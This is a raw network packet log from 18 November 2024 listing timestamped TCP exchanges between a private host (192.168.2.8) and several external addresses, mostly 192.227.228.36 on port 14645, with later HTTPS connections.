                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.832384109 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.834789991 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.834892035 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.834902048 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.834949970 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.835463047 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.835685015 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.861779928 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.861900091 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.861921072 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.861932993 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.861943960 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.861954927 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.861991882 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.862060070 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.862101078 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.862123013 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.862154007 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.862164974 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.862195015 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.862607956 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.862652063 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.862751007 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.862778902 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.862812042 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.862847090 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.862859964 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.862903118 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.862942934 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.862953901 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.862963915 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.862992048 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.863713026 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.863756895 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.864099026 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.912668943 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.941293955 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.941318989 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.941332102 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.941401958 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.954658985 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.954705954 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.954715967 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.954773903 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.955252886 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.955285072 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.955296040 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.955307961 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.955336094 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.955354929 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.957000017 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.957011938 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.957062960 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.957484961 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.957496881 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.957537889 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.957706928 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.982119083 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.982147932 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.982158899 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.982239962 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.982269049 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.982281923 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.982294083 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.982335091 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.982570887 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.982611895 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.982667923 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.982683897 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.982754946 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.982768059 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.982800961 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.982820988 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.983278036 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.983298063 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.983309984 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.983335018 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.983371973 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.983385086 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.983412027 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.983865023 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.983891010 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.983903885 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.983908892 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.983932018 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:26.062088013 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:26.062115908 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:26.062129021 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:26.062155008 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:26.075045109 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:26.075093031 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:26.075294971 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:26.075305939 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:26.075325012 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:26.075339079 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:26.075345993 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:26.075376987 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.878663063 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.883982897 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.884027958 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.884073019 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.884083986 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.884111881 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.884114981 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.884124994 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.884125948 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.884212017 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.884222984 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.884232998 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.884243965 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.884254932 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.890002012 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.890013933 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.890099049 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.890202045 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.890212059 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.890224934 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.891462088 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:27.891514063 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:37.833246946 CET55664443192.168.2.894.245.104.56
                                                                                                                                                                                                                                Nov 18, 2024 16:53:37.833268881 CET4435566494.245.104.56192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:37.833334923 CET55664443192.168.2.894.245.104.56
                                                                                                                                                                                                                                Nov 18, 2024 16:53:37.833523035 CET55664443192.168.2.894.245.104.56
                                                                                                                                                                                                                                Nov 18, 2024 16:53:37.833529949 CET4435566494.245.104.56192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:38.846446991 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:38.856652975 CET5564914645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:38.861496925 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:38.957011938 CET4435566494.245.104.56192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:38.957360983 CET55664443192.168.2.894.245.104.56
                                                                                                                                                                                                                                Nov 18, 2024 16:53:38.957405090 CET4435566494.245.104.56192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:38.958481073 CET4435566494.245.104.56192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:38.958538055 CET55664443192.168.2.894.245.104.56
                                                                                                                                                                                                                                Nov 18, 2024 16:53:38.961029053 CET55664443192.168.2.894.245.104.56
                                                                                                                                                                                                                                Nov 18, 2024 16:53:38.961110115 CET4435566494.245.104.56192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:38.961469889 CET55664443192.168.2.894.245.104.56
                                                                                                                                                                                                                                Nov 18, 2024 16:53:38.961491108 CET4435566494.245.104.56192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:39.029292107 CET55664443192.168.2.894.245.104.56
                                                                                                                                                                                                                                Nov 18, 2024 16:53:39.200660944 CET4435566494.245.104.56192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:39.213222027 CET55664443192.168.2.894.245.104.56
                                                                                                                                                                                                                                Nov 18, 2024 16:53:39.213373899 CET4435566494.245.104.56192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:39.213535070 CET55664443192.168.2.894.245.104.56
                                                                                                                                                                                                                                Nov 18, 2024 16:53:41.539525032 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:41.539581060 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:41.539673090 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:41.539900064 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:41.539917946 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.458233118 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.458544016 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.458570957 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.458933115 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.458945036 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.459055901 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.459055901 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.459068060 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.459117889 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.459621906 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.461069107 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.461147070 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.461252928 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.461272001 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.529230118 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.718790054 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.718832016 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.718934059 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.718964100 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.723217010 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.723270893 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.723290920 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.733181000 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.733266115 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.733288050 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.743608952 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.744509935 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.744533062 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.837646008 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.837687969 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.837723970 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.837739944 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.837820053 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.840212107 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.850215912 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.850306034 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.850316048 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.850577116 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.850622892 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.850651026 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.861660957 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.861782074 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.861792088 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.952980995 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.953047991 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.953059912 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.957200050 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.957288980 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.957289934 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.957298994 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.957328081 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.967020988 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.967087030 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.967267990 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.967281103 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.977838039 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.977897882 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:42.977919102 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.029057980 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.029068947 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.033756018 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.034017086 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.034027100 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.073883057 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.074044943 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.074053049 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.077457905 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.077728033 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.077747107 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.084063053 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.084120989 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.084129095 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.095057964 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.095168114 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.095180988 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.138504028 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.138521910 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.152218103 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.152287006 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.152307987 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.191375017 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.191454887 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.191462994 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.191473961 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.191591024 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.194750071 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.201421022 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.201457024 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.201535940 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.201546907 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.201674938 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.205087900 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.212147951 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.212253094 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.212263107 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.269004107 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.269105911 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.269117117 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.304886103 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.305078030 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.305099964 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.308795929 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.308872938 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.308881044 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.319072962 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.319156885 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.319169044 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.322253942 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.322406054 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.322413921 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.329261065 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.329385996 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.329406977 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.422018051 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.422051907 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.422101021 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.422122002 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.422173977 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.426043987 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.435709953 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.435764074 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.435786963 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.435808897 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.435832024 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.435832977 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.435844898 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.435946941 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.436542034 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.445338011 CET44355677172.217.16.193192.168.2.8
